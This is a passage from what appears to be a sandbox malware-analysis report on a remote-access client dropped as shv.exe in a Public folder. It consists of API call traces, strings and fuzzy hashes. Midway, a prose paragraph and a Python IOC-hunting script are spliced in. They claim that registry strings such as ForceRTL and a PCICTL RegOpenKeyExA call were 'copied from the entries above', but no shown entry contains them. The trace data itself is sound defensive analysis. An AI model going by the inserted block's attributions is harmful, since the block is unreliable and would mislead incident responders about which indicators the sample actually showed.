                                                                                        • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                        APIs
                                                                                          • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                          • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                        • API String ID: 806825551-1858614750
                                                                                        • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                        • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                        APIs
                                                                                          • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                          • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                        • ResetEvent.KERNEL32(00000254), ref: 11144269
                                                                                        • SetEvent.KERNEL32(00000254), ref: 1114427F
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                        • String ID: MiniDump
                                                                                        • API String ID: 1494854734-2840755058
                                                                                        • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                        • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                        APIs
                                                                                        • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                        • wsprintfA.USER32 ref: 11146E06
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                        • API String ID: 1985783259-2296142801
                                                                                        • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                        • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                        • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                        • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
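The entries above expose the host artefacts a responder would hunt for after this sample: the PCICTL registry keys under both vendor names (the RegOpenKeyExA call and the ForceRTL/PCICTL strings), the per-machine key template \Registry\Machine\SOFTWARE\Classes\N%x built next to GetVolumeInformationA and GetComputerNameA, the dropped-file path C:\Users\Public\Netstat\shv.exe returned by GetModuleFileNameA, and the Client32 caption passed to MessageBoxA. The Python below is an added example, not part of this report and not NetSupport code: it parses trace lines in the format used by these entries, turns the registry strings into anchored regexes (printf conversions such as %x become hex-digit classes), extracts file paths and captions, and matches a registry key list against the result. The trace and String ID lines embedded as sample input are copied from the entries above; the host key list is constructed, the reading of "$" as the String ID separator is an assumption, and a bare "SOFTWARE\..." string is assumed to live under HKLM because the observed RegOpenKeyExA call opened the sibling key with root 0x80000002.

```python
"""Turn Joe Sandbox API-trace and "String ID" lines into host IOCs.
Added example, not report or NetSupport code. Line shape assumed from the entries
above: bullet, optional "Part of subcall function <addr>:", "<Api>.<Module>(<args>)",
"ref: <addr>". HKEY root values are the documented winreg.h constants."""
import re
from collections import namedtuple
from typing import Dict, Iterable, List

# Sample input: trace lines copied from the report entries above.
SAMPLE_TRACE = r"""
• RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
• RegCloseKey.ADVAPI32(?), ref: 11145404
  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
• wsprintfA.USER32 ref: 11146E06
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
"""
SAMPLE_STRING_IDS = [  # "String ID" lines from the same entries; '$' read as separator (assumption)
    r"• String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL",
    r"• String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s",
]
HOST_KEYS = [  # constructed registry walk of a hypothetical host; the N<hex> names are invented
    r"HKLM\SOFTWARE\NetSupport Ltd\PCICTL",
    r"HKLM\SOFTWARE\Classes\N1a2b3c4d",
    r"HKLM\SOFTWARE\Classes\N1a2b3c4d.ACM",
    r"HKLM\SOFTWARE\Classes\Notepad",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
]

HKEY_ROOTS = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
TRACE_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+[0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")
HEX = re.compile(r"^[0-9A-Fa-f]+$")
FMT_SPEC = {"x": "[0-9A-Fa-f]+", "s": "[^\\\\]+"}  # printf conversions; %s stays inside one key level
Call = namedtuple("Call", "api module args ref")


def parse_trace(text: str) -> List[Call]:
    """Non-matching lines (headings, Strings) are skipped. Arguments are split on
    ',', which is safe for this report: no path in it contains a comma."""
    calls = []
    for m in filter(None, map(TRACE_LINE.match, text.splitlines())):
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def registry_keys(calls: Iterable[Call]) -> List[str]:
    """RegOpenKey*/RegCreateKey*: arg 0 is the root HKEY, arg 1 the subkey."""
    keys = []
    for c in calls:
        if c.api.startswith(("RegOpenKey", "RegCreateKey")) and len(c.args) >= 2:
            root = HKEY_ROOTS.get(int(c.args[0], 16), c.args[0]) if HEX.match(c.args[0]) else c.args[0]
            keys.append(root + "\\" + c.args[1])
    return keys


def file_paths(calls: Iterable[Call]) -> List[str]:
    """Every argument the sandbox resolved to a drive-letter path."""
    return sorted({a for c in calls for a in c.args if DRIVE_PATH.match(a)})


def window_captions(calls: Iterable[Call]) -> List[str]:
    """MessageBox*(hWnd, lpText, lpCaption, uType): the caption is arg 2."""
    return [c.args[2] for c in calls if c.api.startswith("MessageBox") and len(c.args) > 2 and c.args[2] != "?"]


def format_to_regex(fmt: str) -> re.Pattern:
    """printf-style key template -> anchored regex; registry paths are case-insensitive."""
    out, i = [], 0
    while i < len(fmt):
        if fmt[i] == "%" and fmt[i + 1:i + 2] in FMT_SPEC:
            out.append(FMT_SPEC[fmt[i + 1]])
            i += 2
        else:
            out.append(re.escape(fmt[i]))
            i += 1
    return re.compile("^" + "".join(out) + "$", re.IGNORECASE)


def key_patterns(calls: Iterable[Call], string_id_lines: Iterable[str]) -> Dict[str, re.Pattern]:
    """Exact keys from the trace plus templates from the String ID lines. NT-native
    \\Registry\\Machine maps to HKLM; a bare SOFTWARE\\... string is assumed under HKLM."""
    templates = set(registry_keys(calls))
    for line in string_id_lines:
        for s in filter(None, line.partition("String ID:")[2].strip().split("$")):
            if s.startswith("\\Registry\\Machine\\"):
                templates.add("HKLM\\" + s[len("\\Registry\\Machine\\"):])
            elif s.upper().startswith("SOFTWARE\\"):
                templates.add("HKLM\\" + s)
    return {t: format_to_regex(t) for t in sorted(templates)}


def hunt(host_keys: Iterable[str], patterns: Iterable[re.Pattern]) -> List[str]:
    """Host keys that match any IOC pattern."""
    pats = list(patterns)
    return [k for k in host_keys if any(p.match(k) for p in pats)]


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    pats = key_patterns(calls, SAMPLE_STRING_IDS)
    print(file_paths(calls), window_captions(calls), list(pats), hunt(HOST_KEYS, pats.values()), sep="\n")
```

Run against the sample above it reports the shv.exe path, the Client32 caption, four key templates and three matching host keys; the Notepad and Run keys are left alone because the N%x template only admits hex digits after the N. The weak point of the template is the same in any hunt: a key whose name happens to be N followed by hex-looking characters also matches, so treat an N<hex> hit as a lead to confirm against the PCICTL keys and the dropped file rather than as proof on its own.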
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                          • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                          • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • _memset.LIBCMT ref: 1110F477
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                        • API String ID: 3234921582-2664294811
                                                                                        • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                        • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                        APIs
                                                                                          • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                          • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                        • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                        • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                        • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                        • API String ID: 1108920153-1959555903
                                                                                        • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                        • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11031926
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                        • String ID: %s%s.bin$016477$clientinv.cpp$m_pDoInv == NULL
                                                                                        • API String ID: 4180936305-3600184544
                                                                                        • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                        • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                        • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                        • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                        • __strdup.LIBCMT ref: 111446A7
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                          • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                        • _free.LIBCMT ref: 111446DC
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 398584587-0
                                                                                        • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                        • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                        • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                        • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                        APIs
                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                          • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                        • _free.LIBCMT ref: 1100EDB4
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • _free.LIBCMT ref: 1100EDC7
                                                                                        • _free.LIBCMT ref: 1100EDDA
                                                                                        • _free.LIBCMT ref: 1100EDED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                        • String ID:
                                                                                        • API String ID: 3515823920-0
                                                                                        • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                        • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                        • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                        • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                        APIs
                                                                                          • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • wsprintfA.USER32 ref: 1114593E
                                                                                        • wsprintfA.USER32 ref: 11145954
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                          • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                        • API String ID: 3779116287-2600120591
                                                                                        • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                        • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile$CloseHandle
                                                                                        • String ID: "
                                                                                        • API String ID: 1443461169-123907689
                                                                                        • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                        • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
